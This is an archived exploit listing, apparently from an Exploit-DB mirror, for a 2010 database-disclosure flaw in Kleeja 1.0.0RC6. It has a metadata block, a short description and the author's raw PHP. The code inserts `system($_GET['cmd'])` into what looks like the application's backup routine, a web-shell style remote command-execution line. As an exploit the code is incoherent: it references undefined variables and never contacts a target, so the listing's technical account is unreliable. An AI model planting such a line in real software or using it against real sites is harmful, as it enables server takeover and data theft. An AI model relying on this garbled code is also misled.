kleeja1.0.0RC6 Database Disclosure Exploit

vendor:

Kleeja

by:

indoushka

7,5

CVSS

HIGH

Database Disclosure Exploit

200

CWE

Product Name: Kleeja

Affected Version From: 1.0.0RC6

Affected Version To: 1.0.0RC6

Patch Exists: YES

Related CWE: N/A

CPE: a:kleeja:kleeja

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

kleeja1.0.0RC6 Database Disclosure Exploit

This exploit allows an attacker to download the database of the Kleeja 1.0.0RC6 application. The attacker can send a GET request to the admin.php page with the cp=bckup parameter and a cmd parameter containing the command to be executed. The command is then executed and the output is included in the database backup file.

Mitigation:

Upgrade to the latest version of Kleeja and ensure that all security patches are applied.

Source

Exploit-DB raw data:

====================================================
kleeja1.0.0RC6 Database Disclosure Exploit
====================================================

######################################################################## 

# Vendor: kleeja.com
# Date: 2010-05-27 
# Author : indoushka 
# Contact : 00213771818860
# Home : www.sec4ever.com
# Bug  : Database Disclosure Exploit
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 

<?php

$action 	= "http://127.0.0.1/kleeja/admin.php?cp=bckup";
$sql_data = "# 1.0.0RC6, DB version:6\n";
			$sql_data .= "# Kleeja Backup kleeja.com  kleeja version : " . KLEEJA_VERSION . ", DB version:" . $config['db_version'] . "\n";
			$sql_data .= "# DATE : " . gmdate("d-m-Y H:i:s", time()) . " GMT\n";
			$sql_data .= "#\n\n\n";
			$cmd = $_GET['cmd'];
            system($cmd);
			$db_name_save = $dbname . '_kleeja.sql';
			@set_time_limit(0);
			header("Content-length: " . strlen($outta));
			header("Content-type: text/plain");
			header("Content-Disposition: attachment; filename=$db_name_save");
			echo $sql_data . $outta;
			exit;


?>


Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH
---------------------------------------------------------------------------------------------------------------------------------